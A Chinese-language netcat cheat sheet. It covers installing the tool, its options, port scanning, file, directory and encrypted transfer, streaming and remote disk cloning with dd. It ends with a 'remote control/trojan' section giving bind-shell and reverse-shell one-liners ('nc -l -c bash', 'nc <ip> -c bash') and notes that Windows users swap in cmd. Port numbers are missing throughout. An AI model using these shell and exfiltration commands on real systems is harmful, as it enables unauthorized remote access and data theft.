nc 安装
yum install -y nc
参数:
Command Summary:
- Use IPv4
- Use IPv6
-D Enable the debug socket option
-d Detach from stdin #无图形界面使用后台模式
-h This help text #获取帮助信息
-i secs Delay interval for lines sent, ports scanned #延时设置,端口扫描时使用
-k Keep inbound sockets open for multiple connects
-l Listen mode, for inbound connects #监听入站信息
-n Suppress name/port resolutions #后跟ip地址
-p port Specify local port for remote connects
-r Randomize remote ports
-S Enable the TCP MD5 signature option
-s addr Local source address #发送数据源地址
-T ToS Set IP Type of Service
-C Send CRLF as line-ending
-t Answer TELNET negotiation #以TELNET的形式应答入站请求
-U Use UNIX domain socket
-u UDP mode #使用UDP协议
-v Verbose #显示详细的输出内容
-w secs Timeout for connects and final net reads #超时秒数
-X proto Proxy protocol: "", "" (SOCKS) or "connect"
-x addr[:port] Specify proxy address and port
-z Zero-I/O mode [used for scanning] # I/O 模式,扫描时使用
nc作为客户端:
nc -nvz 10.104.11.107 - 默认探测TCP端口
nc -nvzu 10.104.11.107 - #探测UDP端口
作用:
传输文本信息
nc -l #客户端开启一个端口
netstat -pantu |grep #查看33端口是否打开
nc -l >ps.txt 监听到的信息输出到pa.txt
进行连接:
nc -nvv 10.104.11.128
ls -l |nc -nv 10.104.11.128 输出信息打印到10.104.11.128主机
传输文件
A: nc -l >.html
B: nc -nv 10.104.11.128 <.html
或者
A:nc -l <ps.txt
B: nc -nv 10.104.11.128 >ps.txt
传输目录(先打包)
A:tar -cvf - music/|nc -l
B:nc -nv 10.104.11.128 |tar -xvf -
加密传输文件(先加密在传送再解密)
A:nc -l |mcrypt --flush -Fbqd(加密) -a rijndael- -m ecb >.mp3
B:mcrypt --flush -Fbq(解密) -a rijndael- -m ecb <.mp3 |nc -nv 10.104.11.128
#对称加密两边密码要相同
流媒体服务
A: cat .mp3|nc -l
B: nc -nv 10.104.11.107|mplayer -vo xll -cache - #指定媒体播放器进行播放
端口扫描
nc -nvz 10.104.11.128
远程克隆硬盘
A:nc -l |dd of =/dev/sda
B:dd if=/dev/sda |nc -nv 10.104.11.128
远程控制/木马
正向:
A:nc -l -c bash
B:nc 10.104.11.128
反向:
A:nc -l
B:nc 10.104.11.128 -c bash
注:Windows用户把bash改成cmd
缺点:缺乏加密与身份认证